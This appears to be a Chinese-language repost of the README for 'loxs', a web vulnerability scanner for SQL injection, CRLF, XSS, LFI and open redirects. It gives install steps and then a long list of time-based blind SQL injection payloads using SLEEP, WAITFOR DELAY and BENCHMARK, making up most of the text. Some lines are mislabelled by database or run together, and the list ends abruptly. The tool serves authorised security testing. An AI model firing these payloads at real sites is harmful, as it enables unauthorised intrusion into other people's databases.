loxs 用于扫描SQLi、CRLF、XSS、LFi、OpenRedirect的工具

查找 SQLi、CRLF、XSS、LFi、OpenRedirect 的最佳工具.

免责声明

Loxs 仅用于教育和道德黑客目的。它只应用于测试您拥有的系统或有明确测试许可的系统。未经同意擅自使用第三方网站或系统是违法和不道德的。

特色

特征	关于
`LFI Scanner`	检测本地文件包含漏洞。
`OR Scanner`	识别开放重定向漏洞。
`SQL Scanner`	检测 SQL 注入漏洞。
`XSS Scanner`	识别跨站点脚本漏洞。
`CRLF Scanner`	检测CRLF注入漏洞。
`Multi-threaded Scanning`	通过多线程提高性能。
`Customizable Payloads`	调整有效载荷以适合特定目标。
`Success Criteria`	修改特定用例的成功检测标准。
`User-friendly CLI`	简单直观的命令行界面。
`Save Vulnerable URLs`	选择将易受攻击的 URL 保存到文件中以供将来参考。
`HTML Report Generation`	生成发现的漏洞的详细 HTML 报告。

环境

语言	包
*Python*	`Python 3.x` `webdriver_manager` `selenium` `aiohttp` `beautifulsoup4` `colorama` `rich` `requests` `gitpython` `prompt_toolkit` `pyyaml` `Flask`

安装

克隆存储库

git clone https://github.com/coffinxp/loxs.git

cd loxs

安装requirements

pip3 install -r requirements.txt

运行脚本

python3 loxs.py

输入信息
输入 URL/文件（Input URL/File）	提供单个 URL 或包含多个 URL 的输入文件以供扫描。
有效负载文件（Payload File）	为特定类型的漏洞扫描选择或提供自定义有效负载文件。
成功标准（Success Criteria）	定义表示成功利用尝试的模式或字符串。
并发线程（Concurrent Threads）	设置多线程扫描的线程数。
查看并保存结果（View and Save Results）	在扫描过程中实时显示结果，并保存易受攻击的 URL 以供将来使用。

自定义
Custom Payloads	修改或创建针对不同漏洞类型的有效载荷文件以针对特定的应用程序。
Success Criteria	调整工具的成功模式以更准确地检测成功的利用。
Concurrent Threads	控制扫描期间使用的线程数，以优化性能。

安装Chrome

wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb

sudo dpkg -i google-chrome-stable_current_amd64.deb

如果安装过程中遇到任何错误，请使用以下命令：

sudo apt -f install

sudo dpkg -i google-chrome-stable_current_amd64.deb

Chrome 驱动程序安装

wget https://storage.googleapis.com/chrome-for-testing-public/128.0.6613.119/linux64/chromedriver-linux64.zip

unzip chromedriver-linux64.zip

cd chromedriver-linux64

sudo mv chromedriver /usr/bin

payload

通用SQLi

(sleep 10)--
(sleep 10)
(sleep(10))--
(sleep(10))
-sleep(10)
SLEEP(10)#
SLEEP(10)--
SLEEP(10)="
SLEEP(10)='
";sleep 10--
";sleep 10
";sleep(10)--
";sleep(10)
";SELECT SLEEP(10); #
1 SELECT SLEEP(10); #
+ SLEEP(10) + '
&&SLEEP(10)
&&SLEEP(10)--
&&SLEEP(10)#
;sleep 10--
;sleep 10
;sleep(10)--
;sleep(10)
;SELECT SLEEP(10); #
'&&SLEEP(10)&&'1
' SELECT SLEEP(10); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(10)
ORDER BY SLEEP(10)--
ORDER BY SLEEP(10)#
AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
RANDOMBLOB(5000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
RANDOMBLOB(10000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2))))

mssql

waitfor delay '00:02'
waitfor delay '00:02' -- 
waitfor delay \'00:02\'
waitfor delay \'00:02\' -- 
%00 waitfor delay '00:02'
%00 waitfor delay '00:02' -- 
%00 waitfor delay \'00:02\'
%00 waitfor delay \'00:02\' -- 
%00' waitfor delay '00:02' -- 
%00';waitfor delay '00:02' -- 
%00;waitfor delay '00:02'
%00;waitfor delay '00:02' -- 
%00;waitfor delay \'00:02\'
%00;waitfor delay \'00:02\' -- 
%00\' waitfor delay \'00:02\' -- 
%00\';waitfor delay \'00:02\' -- 
%00\\' waitfor delay \\'00:02\\' -- 
%00\\';waitfor delay \\'00:02\\' -- 
%0a waitfor delay '00:02'
%0a waitfor delay '00:02' -- 
%0a waitfor delay \'00:02\'
%0a waitfor delay \'00:02\' -- 
%0a' waitfor delay '00:02' -- 
%0a';waitfor delay '00:02' -- 
%0a;waitfor delay '00:02'
%0a;waitfor delay '00:02' -- 
%0a;waitfor delay \'00:02\'
%0a;waitfor delay \'00:02\' -- 
%0a\' waitfor delay \'00:02\' -- 
%0a\';waitfor delay \'00:02\' -- 
%0a\\' waitfor delay \\'00:02\\' -- 
%0a\\';waitfor delay \\'00:02\\' -- 
%0d%0a waitfor delay '00:02'
%0d%0a waitfor delay '00:02' -- 
%0d%0a waitfor delay \'00:02\'
%0d%0a waitfor delay \'00:02\' -- 
%0d%0a' waitfor delay '00:02' -- 
%0d%0a';waitfor delay '00:02' -- 
%0d%0a;waitfor delay '00:02'
%0d%0a;waitfor delay '00:02' -- 
%0d%0a;waitfor delay \'00:02\'
%0d%0a;waitfor delay \'00:02\' -- 
%0d%0a\' waitfor delay \'00:02\' -- 
%0d%0a\';waitfor delay \'00:02\' -- 
%0d%0a\\' waitfor delay \\'00:02\\' -- 
%0d%0a\\';waitfor delay \\'00:02\\' -- 
' waitfor delay '00:02' -- 
';waitfor delay '00:02' -- 
0x00 waitfor delay '00:02'
0x00 waitfor delay '00:02' -- 
0x00 waitfor delay \'00:02\'
0x00 waitfor delay \'00:02\' -- 
0x00' waitfor delay '00:02' -- 
0x00';waitfor delay '00:02' -- 
0x00;waitfor delay '00:02'
0x00;waitfor delay '00:02' -- 
0x00;waitfor delay \'00:02\'
0x00;waitfor delay \'00:02\' -- 
0x00\' waitfor delay \'00:02\' -- 
0x00\';waitfor delay \'00:02\' -- 
0x00\\' waitfor delay \\'00:02\\' -- 
0x00\\';waitfor delay \\'00:02\\' -- 
0x0a waitfor delay '00:02'
0x0a waitfor delay '00:02' -- 
0x0a waitfor delay \'00:02\'
0x0a waitfor delay \'00:02\' -- 
0x0a' waitfor delay '00:02' -- 
0x0a';waitfor delay '00:02' -- 
0x0a;waitfor delay '00:02'
0x0a;waitfor delay '00:02' -- 
0x0a;waitfor delay \'00:02\'
0x0a;waitfor delay \'00:02\' -- 
0x0a\' waitfor delay \'00:02\' -- 
0x0a\';waitfor delay \'00:02\' -- 
0x0a\\' waitfor delay \\'00:02\\' -- 
0x0a\\';waitfor delay \\'00:02\\' -- 
0x0d0a waitfor delay '00:02'
0x0d0a waitfor delay '00:02' -- 
0x0d0a waitfor delay \'00:02\'
0x0d0a waitfor delay \'00:02\' -- 
0x0d0a' waitfor delay '00:02' -- 
0x0d0a';waitfor delay '00:02' -- 
0x0d0a;waitfor delay '00:02'
0x0d0a;waitfor delay '00:02' -- 
0x0d0a;waitfor delay \'00:02\'
0x0d0a;waitfor delay \'00:02\' -- 
0x0d0a\' waitfor delay \'00:02\' -- 
0x0d0a\';waitfor delay \'00:02\' -- 
0x0d0a\\' waitfor delay \\'00:02\\' -- 
0x0d0a\\';waitfor delay \\'00:02\\' -- 
;waitfor delay '00:02'
;waitfor delay '00:02' -- 
;waitfor delay \'00:02\'
;waitfor delay \'00:02\' -- 
\' waitfor delay \'00:02\' -- 
\';waitfor delay \'00:02\' -- 
\\' waitfor delay \\'00:02\\' -- 
\\';waitfor delay \\'00:02\\' -- 
\\n waitfor delay '00:02'
\\n waitfor delay '00:02' -- 
\\n waitfor delay \'00:02\'
\\n waitfor delay \'00:02\' -- 
\\n' waitfor delay '00:02' -- 
\\n';waitfor delay '00:02' -- 
\\n;waitfor delay '00:02'
\\n;waitfor delay '00:02' -- 
\\n;waitfor delay \'00:02\'
\\n;waitfor delay \'00:02\' -- 
\\n\\' waitfor delay \\'00:02\\' -- 
\\n\\';waitfor delay \\'00:02\\' -- 
\\r\\n waitfor delay '00:02'
\\r\\n waitfor delay '00:02' -- 
\\r\\n waitfor delay \'00:02\'
\\r\\n waitfor delay \'00:02\' -- 
\\r\\n' waitfor delay '00:02' -- 
\\r\\n';waitfor delay '00:02' -- 
\\r\\n;waitfor delay '00:02'
\\r\\n;waitfor delay '00:02' -- 
\\r\\n;waitfor delay \'00:02\'
\\r\\n;waitfor delay \'00:02\' -- 
\\r\\n\\' waitfor delay \\'00:02\\' -- 
\\r\\n\\';waitfor delay \\'00:02\\' -- 
\n waitfor delay '00:02'
\n waitfor delay '00:02' -- 
\n waitfor delay \'00:02\'
\n waitfor delay \'00:02\' -- 
\n' waitfor delay '00:02' -- 
\n';waitfor delay '00:02' -- 
\n;waitfor delay '00:02'
\n;waitfor delay '00:02' -- 
\n;waitfor delay \'00:02\'
\n;waitfor delay \'00:02\' -- 
\n\' waitfor delay \'00:02\' -- 
\n\';waitfor delay \'00:02\' -- 
\r\n waitfor delay '00:02'
\r\n waitfor delay '00:02' -- 
\r\n waitfor delay \'00:02\'
\r\n waitfor delay \'00:02\' -- 
\r\n' waitfor delay '00:02' -- 
\r\n';waitfor delay '00:02' -- 
\r\n;waitfor delay '00:02'
\r\n;waitfor delay '00:02' -- 
\r\n;waitfor delay \'00:02\'
\r\n;waitfor delay \'00:02\' -- 
\r\n\' waitfor delay \'00:02\' -- 
\r\n\';waitfor delay \'00:02\' --

mysql

waitfor delay '0:0:10'--
;waitfor delay '0:0:10'--
);waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
";waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
");waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
'));waitfor delay '0:0:10'--
"));waitfor delay '0:0:10'--
") IF (1=1) WAITFOR DELAY '0:0:10'--
';%5waitfor%5delay%5'0:0:10'%5--%5
' WAITFOR DELAY '0:0:10'--
' WAITFOR DELAY '0:0:10'
or WAITFOR DELAY '0:0:10'--
or WAITFOR DELAY '0:0:10'
and WAITFOR DELAY '0:0:10'--
and WAITFOR DELAY '0:0:10'
WAITFOR DELAY '0:0:10'
;WAITFOR DELAY '0:0:10'--
;WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'--
1 WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'-- 1337
1' WAITFOR DELAY '0:0:10' AND '1337'='1337
1') WAITFOR DELAY '0:0:10' AND ('1337'='1337
1) WAITFOR DELAY '0:0:10' AND (1337=1337
' WAITFOR DELAY '0:0:10'--
" WAITFOR DELAY '0:0:10'--
')) WAITFOR DELAY '0:0:10'--
'))) WAITFOR DELAY '0:0:10'--
%' WAITFOR DELAY '0:0:10'--
") WAITFOR DELAY '0:0:10'--
")) WAITFOR DELAY '0:0:10'--
"))) WAITFOR DELAY '0:0:10'--
1 waitfor delay '0:0:10'--
1' waitfor delay '0:0:10'--
1 and sleep(10)--
1 and sleep(10)
1 and sleep(10)--
1 and sleep(10)
' and sleep(10)--
' and sleep(10)
' and sleep(10) and '1'='1
' and sleep(10) and '1'='1
' and sleep(10)--
' and sleep(10)
' AnD SLEEP(10) ANd '1
and sleep(10)--
and sleep(10)
and sleep(10)--
and sleep(10)
and SELECT SLEEP(10); #
AnD SLEEP(10)
AnD SLEEP(10)--
AnD SLEEP(10)#
' AND SLEEP(10)#
" AND SLEEP(10)#
') AND SLEEP(10)#
or sleep(10)--
or sleep(10)
or sleep(10)--
or sleep(10)
or SELECT SLEEP(10); #
or SLEEP(10)
or SLEEP(10)#
or SLEEP(10)--
or SLEEP(10)="
or SLEEP(10)='
' OR SLEEP(10)#
" OR SLEEP(10)#
') OR SLEEP(10)#
')) or sleep(10)='
" or sleep(10)#
1) or sleep(10)#
)) or sleep(10)='
1)) or sleep(10)#
or sleep(10)#
%20'sleep%2010'
%20$(sleep%2010)
")) or sleep(10)="
or sleep(10)='
") or sleep(10)="
) or sleep(10)='
1 OR sleep(10)#1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337RLIKE SLEEP(5)--
' RLIKE SLEEP(10)--
' RLIKE SLEEP(10)-- 1337
" RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10) AND ('1337'='1337
')) RLIKE SLEEP(10) AND (('1337'='1337
'))) RLIKE SLEEP(10) AND ((('1337'='1337
) RLIKE SLEEP(10)-- 1337
) RLIKE SLEEP(10) AND (1337=1337
)) RLIKE SLEEP(10) AND ((1337=1337
))) RLIKE SLEEP(10) AND (((1337=1337
1 RLIKE SLEEP(10)
1 RLIKE SLEEP(10)-- 1337
1 RLIKE SLEEP(10)# 1337
1 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(10))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' RLIKE SLEEP(10) AND '1337'='1337
') RLIKE SLEEP(10) AND ('1337' LIKE '1337
')) RLIKE SLEEP(10) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(10) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(10) AND '1337%'='1337
' RLIKE SLEEP(10) AND '1337' LIKE '1337
") RLIKE SLEEP(10) AND ("1337"="1337
")) RLIKE SLEEP(10) AND (("1337"="1337
"))) RLIKE SLEEP(10) AND ((("1337"="1337
" RLIKE SLEEP(10) AND "1337"="1337
") RLIKE SLEEP(10) AND ("1337" LIKE "1337
")) RLIKE SLEEP(10) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(10) AND ((("1337" LIKE "1337
" RLIKE SLEEP(10) AND "1337" LIKE "1337
' RLIKE SLEEP(10) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' AND ELT(1337=1337,SLEEP(10))--
' AND ELT(1337=1337,SLEEP(10))-- 1337
" AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(10))-- 1337
) AND ELT(1337=1337,SLEEP(10)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(10)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(10)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(10))
1 AND ELT(1337=1337,SLEEP(10))-- 1337
1 AND ELT(1337=1337,SLEEP(10))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(10)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))|[1
%' AND ELT(1337=1337,SLEEP(10)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(10)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '134')
 and 1337=(select 1337 from (select sleep(120))A)
 and 1337=(select 1337 from (select sleep(120))A) -- 
 and sleep(120)
 and sleep(120) -- 
 or 1337=(select 1337 from (select sleep(120))A)
 or 1337=(select 1337 from (select sleep(120))A) -- 
 or sleep(120)
 or sleep(120) -- 
%00 and 1337=(select 1337 from (select sleep(120))A)
%00 and 1337=(select 1337 from (select sleep(120))A) -- 
%00 and sleep(120)
%00 and sleep(120) -- 
%00 or 1337=(select 1337 from (select sleep(120))A)
%00 or 1337=(select 1337 from (select sleep(120))A) -- 
%00 or sleep(120)
%00 or sleep(120) -- 
%00' and 1337=(select 1337 from (select sleep(120))A) -- 
%00' and sleep(120) -- 
%00' or 1337=(select 1337 from (select sleep(120))A) -- 
%00' or sleep(120) -- 
%00';select sleep(120) -- 
%00;select sleep(120)
%00;select sleep(120) -- 
%00\' and 1337=(select 1337 from (select sleep(120))A) -- 
%00\' and sleep(120) -- 
%00\' or 1337=(select 1337 from (select sleep(120))A) -- 
%00\' or sleep(120) -- 
%00\';select sleep(120) -- 
%00\\' and 1337=(select 1337 from (select sleep(120))A) -- 
%00\\' and sleep(120) -- 
%00\\' or 1337=(select 1337 from (select sleep(120))A) -- 
%00\\' or sleep(120) -- 
%00\\';select sleep(120) -- 
%00sleep(120)
%00sleep(120) -- 
%0a and 1337=(select 1337 from (select sleep(120))A)
%0a and 1337=(select 1337 from (select sleep(120))A) -- 
%0a and sleep(120)
%0a and sleep(120) -- 
%0a or 1337=(select 1337 from (select sleep(120))A)
%0a or 1337=(select 1337 from (select sleep(120))A) -- 
%0a or sleep(120)
%0a or sleep(120) -- 
%0a' and 1337=(select 1337 from (select sleep(120))A) -- 
%0a' and sleep(120) -- 
%0a' or 1337=(select 1337 from (select sleep(120))A) -- 
%0a' or sleep(120) -- 
%0a';select sleep(120) -- 
%0a;select sleep(120)
%0a;select sleep(120) -- 
%0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0a\' and sleep(120) -- 
%0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0a\' or sleep(120) -- 
%0a\';select sleep(120) -- 
%0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0a\\' and sleep(120) -- 
%0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0a\\' or sleep(120) -- 
%0a\\';select sleep(120) -- 
%0asleep(120)
%0asleep(120) -- 
%0d%0a and 1337=(select 1337 from (select sleep(120))A)
%0d%0a and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a and sleep(120)
%0d%0a and sleep(120) -- 
%0d%0a or 1337=(select 1337 from (select sleep(120))A)
%0d%0a or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a or sleep(120)
%0d%0a or sleep(120) -- 
%0d%0a' and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a' and sleep(120) -- 
%0d%0a' or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a' or sleep(120) -- 
%0d%0a';select sleep(120) -- 
%0d%0a;select sleep(120)
%0d%0a;select sleep(120) -- 
%0d%0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\' and sleep(120) -- 
%0d%0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\' or sleep(120) -- 
%0d%0a\';select sleep(120) -- 
%0d%0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\\' and sleep(120) -- 
%0d%0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
%0d%0a\\' or sleep(120) -- 
%0d%0a\\';select sleep(120) -- 
%0d%0asleep(120)
%0d%0asleep(120) -- 
' and 1337=(select 1337 from (select sleep(120))A) -- 
' and sleep(120) -- 
' or 1337=(select 1337 from (select sleep(120))A) -- 
' or sleep(120) -- 
';select sleep(120) -- 
0x00 and 1337=(select 1337 from (select sleep(120))A)
0x00 and 1337=(select 1337 from (select sleep(120))A) -- 
0x00 and sleep(120)
0x00 and sleep(120) -- 
0x00 or 1337=(select 1337 from (select sleep(120))A)
0x00 or 1337=(select 1337 from (select sleep(120))A) -- 
0x00 or sleep(120)
0x00 or sleep(120) -- 
0x00' and 1337=(select 1337 from (select sleep(120))A) -- 
0x00' and sleep(120) -- 
0x00' or 1337=(select 1337 from (select sleep(120))A) -- 
0x00' or sleep(120) -- 
0x00';select sleep(120) -- 
0x00;select sleep(120)
0x00;select sleep(120) -- 
0x00\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x00\' and sleep(120) -- 
0x00\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x00\' or sleep(120) -- 
0x00\';select sleep(120) -- 
0x00\\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x00\\' and sleep(120) -- 
0x00\\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x00\\' or sleep(120) -- 
